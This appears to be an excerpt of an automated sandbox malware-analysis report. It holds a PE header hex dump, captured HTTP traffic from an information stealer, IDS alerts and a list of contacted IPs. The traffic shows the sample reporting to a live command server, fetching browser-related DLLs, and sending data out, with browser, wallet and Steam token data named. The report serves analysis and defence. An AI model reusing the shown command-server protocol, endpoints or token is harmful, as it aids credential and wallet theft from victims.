f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 77.220.212.32Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /eb51242cada87444.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDGHJDBFIJKECAECAFHost: 77.220.212.32Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 30 42 30 42 45 30 38 43 44 30 37 34 31 37 30 30 36 36 32 33 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 2d 2d 0d 0a Data Ascii: ------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="hwid"10B0BE08CD07417006623------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="build"LogsDiller------EHJDGHJDBFIJKECAECAF--
Source: global traffic	HTTP traffic detected: POST /eb51242cada87444.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKECFIEBGCAKJKECGCFIHost: 77.220.212.32Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 4b 45 43 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 66 37 66 37 32 65 64 65 35 32 36 63 30 62 64 31 61 62 65 31 39 64 32 38 33 38 65 37 61 30 36 31 31 63 37 61 33 61 65 39 31 38 37 37 65 36 66 39 33 63 37 34 62 30 64 37 31 34 64 36 33 33 36 62 32 63 30 38 66 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 4b 45 43 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 4b 45 43 47 43 46 49 2d 2d 0d 0a Data Ascii: ------KKECFIEBGCAKJKECGCFIContent-Disposition: form-data; name="token"47f7f72ede526c0bd1abe19d2838e7a0611c7a3ae91877e6f93c74b0d714d6336b2c08f3------KKECFIEBGCAKJKECGCFIContent-Disposition: form-data; name="message"browsers------KKECFIEBGCAKJKECGCFI--
Source: global traffic	HTTP traffic detected: POST /eb51242cada87444.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKJEGCFBGDHJJJJJKJEHost: 77.220.212.32Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 66 37 66 37 32 65 64 65 35 32 36 63 30 62 64 31 61 62 65 31 39 64 32 38 33 38 65 37 61 30 36 31 31 63 37 61 33 61 65 39 31 38 37 37 65 36 66 39 33 63 37 34 62 30 64 37 31 34 64 36 33 33 36 62 32 63 30 38 66 33 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 2d 2d 0d 0a Data Ascii: ------AAKJEGCFBGDHJJJJJKJEContent-Disposition: form-data; name="token"47f7f72ede526c0bd1abe19d2838e7a0611c7a3ae91877e6f93c74b0d714d6336b2c08f3------AAKJEGCFBGDHJJJJJKJEContent-Disposition: form-data; name="message"plugins------AAKJEGCFBGDHJJJJJKJE--
Source: global traffic	HTTP traffic detected: POST /eb51242cada87444.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDHDAFIDGDBGCAAFIDHHost: 77.220.212.32Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 48 44 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 66 37 66 37 32 65 64 65 35 32 36 63 30 62 64 31 61 62 65 31 39 64 32 38 33 38 65 37 61 30 36 31 31 63 37 61 33 61 65 39 31 38 37 37 65 36 66 39 33 63 37 34 62 30 64 37 31 34 64 36 33 33 36 62 32 63 30 38 66 33 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 48 44 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 48 44 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 2d 2d 0d 0a Data Ascii: ------BGDHDAFIDGDBGCAAFIDHContent-Disposition: form-data; name="token"47f7f72ede526c0bd1abe19d2838e7a0611c7a3ae91877e6f93c74b0d714d6336b2c08f3------BGDHDAFIDGDBGCAAFIDHContent-Disposition: form-data; name="message"fplugins------BGDHDAFIDGDBGCAAFIDH--
Source: global traffic	HTTP traffic detected: POST /eb51242cada87444.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBGIEGCFHCFHIDHIJECHost: 77.220.212.32Content-Length: 6683Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /241bc8c289ca83f4/sqlite3.dll HTTP/1.1Host: 77.220.212.32Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /eb51242cada87444.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKKKJJJKJKFHJJJJECBFHost: 77.220.212.32Content-Length: 991Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /eb51242cada87444.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAAFBGDBKJJJKFIIIJJHost: 77.220.212.32Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 66 37 66 37 32 65 64 65 35 32 36 63 30 62 64 31 61 62 65 31 39 64 32 38 33 38 65 37 61 30 36 31 31 63 37 61 33 61 65 39 31 38 37 37 65 36 66 39 33 63 37 34 62 30 64 37 31 34 64 36 33 33 36 62 32 63 30 38 66 33 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 2d 2d 0d 0a Data Ascii: ------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="token"47f7f72ede526c0bd1abe19d2838e7a0611c7a3ae91877e6f93c74b0d714d6336b2c08f3------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="file"------IDAAFBGDBKJJJKFIIIJJ--
Source: global traffic	HTTP traffic detected: POST /eb51242cada87444.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIDBKJJDGHDHJKEHJDBHost: 77.220.212.32Content-Length: 3087Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /eb51242cada87444.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJEBKKEGDBFIIEBFHIEHHost: 77.220.212.32Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 66 37 66 37 32 65 64 65 35 32 36 63 30 62 64 31 61 62 65 31 39 64 32 38 33 38 65 37 61 30 36 31 31 63 37 61 33 61 65 39 31 38 37 37 65 36 66 39 33 63 37 34 62 30 64 37 31 34 64 36 33 33 36 62 32 63 30 38 66 33 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 2d 2d 0d 0a Data Ascii: ------IJEBKKEGDBFIIEBFHIEHContent-Disposition: form-data; name="token"47f7f72ede526c0bd1abe19d2838e7a0611c7a3ae91877e6f93c74b0d714d6336b2c08f3------IJEBKKEGDBFIIEBFHIEHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IJEBKKEGDBFIIEBFHIEHContent-Disposition: form-data; name="file"------IJEBKKEGDBFIIEBFHIEH--
Source: global traffic	HTTP traffic detected: GET /241bc8c289ca83f4/freebl3.dll HTTP/1.1Host: 77.220.212.32Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /241bc8c289ca83f4/mozglue.dll HTTP/1.1Host: 77.220.212.32Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /241bc8c289ca83f4/msvcp140.dll HTTP/1.1Host: 77.220.212.32Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /241bc8c289ca83f4/nss3.dll HTTP/1.1Host: 77.220.212.32Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /241bc8c289ca83f4/softokn3.dll HTTP/1.1Host: 77.220.212.32Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /241bc8c289ca83f4/vcruntime140.dll HTTP/1.1Host: 77.220.212.32Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /eb51242cada87444.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAEGCGCGIEGDHIDHJJEHHost: 77.220.212.32Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /eb51242cada87444.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJEBFCFIJJJEBGDBAKEHost: 77.220.212.32Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 66 37 66 37 32 65 64 65 35 32 36 63 30 62 64 31 61 62 65 31 39 64 32 38 33 38 65 37 61 30 36 31 31 63 37 61 33 61 65 39 31 38 37 37 65 36 66 39 33 63 37 34 62 30 64 37 31 34 64 36 33 33 36 62 32 63 30 38 66 33 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 2d 2d 0d 0a Data Ascii: ------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="token"47f7f72ede526c0bd1abe19d2838e7a0611c7a3ae91877e6f93c74b0d714d6336b2c08f3------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="message"wallets------IIJEBFCFIJJJEBGDBAKE--
Source: global traffic	HTTP traffic detected: POST /eb51242cada87444.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDBKKFHIEGDHJKECAAKHost: 77.220.212.32Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 66 37 66 37 32 65 64 65 35 32 36 63 30 62 64 31 61 62 65 31 39 64 32 38 33 38 65 37 61 30 36 31 31 63 37 61 33 61 65 39 31 38 37 37 65 36 66 39 33 63 37 34 62 30 64 37 31 34 64 36 33 33 36 62 32 63 30 38 66 33 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 2d 2d 0d 0a Data Ascii: ------BGDBKKFHIEGDHJKECAAKContent-Disposition: form-data; name="token"47f7f72ede526c0bd1abe19d2838e7a0611c7a3ae91877e6f93c74b0d714d6336b2c08f3------BGDBKKFHIEGDHJKECAAKContent-Disposition: form-data; name="message"files------BGDBKKFHIEGDHJKECAAK--
Source: global traffic	HTTP traffic detected: POST /eb51242cada87444.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEBFCFIJJKKECAKJEHDHost: 77.220.212.32Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 66 37 66 37 32 65 64 65 35 32 36 63 30 62 64 31 61 62 65 31 39 64 32 38 33 38 65 37 61 30 36 31 31 63 37 61 33 61 65 39 31 38 37 37 65 36 66 39 33 63 37 34 62 30 64 37 31 34 64 36 33 33 36 62 32 63 30 38 66 33 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 44 2d 2d 0d 0a Data Ascii: ------AKEBFCFIJJKKECAKJEHDContent-Disposition: form-data; name="token"47f7f72ede526c0bd1abe19d2838e7a0611c7a3ae91877e6f93c74b0d714d6336b2c08f3------AKEBFCFIJJKKECAKJEHDContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AKEBFCFIJJKKECAKJEHDContent-Disposition: form-data; name="file"------AKEBFCFIJJKKECAKJEHD--
Source: global traffic	HTTP traffic detected: POST /eb51242cada87444.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBKECAKFBGCAKECGIEHHost: 77.220.212.32Content-Length: 98755Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /eb51242cada87444.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHJEGIIEGIDGIDHJDAKFHost: 77.220.212.32Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 4a 45 47 49 49 45 47 49 44 47 49 44 48 4a 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 66 37 66 37 32 65 64 65 35 32 36 63 30 62 64 31 61 62 65 31 39 64 32 38 33 38 65 37 61 30 36 31 31 63 37 61 33 61 65 39 31 38 37 37 65 36 66 39 33 63 37 34 62 30 64 37 31 34 64 36 33 33 36 62 32 63 30 38 66 33 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 45 47 49 49 45 47 49 44 47 49 44 48 4a 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 45 47 49 49 45 47 49 44 47 49 44 48 4a 44 41 4b 46 2d 2d 0d 0a Data Ascii: ------FHJEGIIEGIDGIDHJDAKFContent-Disposition: form-data; name="token"47f7f72ede526c0bd1abe19d2838e7a0611c7a3ae91877e6f93c74b0d714d6336b2c08f3------FHJEGIIEGIDGIDHJDAKFContent-Disposition: form-data; name="message"ybncbhylepme------FHJEGIIEGIDGIDHJDAKF--
Source: global traffic	HTTP traffic detected: POST /eb51242cada87444.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KECFCGHIDHCAKEBFCFHCHost: 77.220.212.32Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 43 46 43 47 48 49 44 48 43 41 4b 45 42 46 43 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 66 37 66 37 32 65 64 65 35 32 36 63 30 62 64 31 61 62 65 31 39 64 32 38 33 38 65 37 61 30 36 31 31 63 37 61 33 61 65 39 31 38 37 37 65 36 66 39 33 63 37 34 62 30 64 37 31 34 64 36 33 33 36 62 32 63 30 38 66 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 46 43 47 48 49 44 48 43 41 4b 45 42 46 43 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 46 43 47 48 49 44 48 43 41 4b 45 42 46 43 46 48 43 2d 2d 0d 0a Data Ascii: ------KECFCGHIDHCAKEBFCFHCContent-Disposition: form-data; name="token"47f7f72ede526c0bd1abe19d2838e7a0611c7a3ae91877e6f93c74b0d714d6336b2c08f3------KECFCGHIDHCAKEBFCFHCContent-Disposition: form-data; name="message"wkkjqaiaxkhb------KECFCGHIDHCAKEBFCFHC--

Source: Joe Sandbox View	IP Address: 23.198.7.184 23.198.7.184
Source: Joe Sandbox View	IP Address: 18.244.18.27 18.244.18.27
Source: Joe Sandbox View	IP Address: 20.125.209.212 20.125.209.212
Source: Joe Sandbox View	IP Address: 13.89.178.27 13.89.178.27

Source: Joe Sandbox View

JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49699 -> 77.220.212.32:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:52982 -> 77.220.212.32:80
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.7:49754
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.7:27888

Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
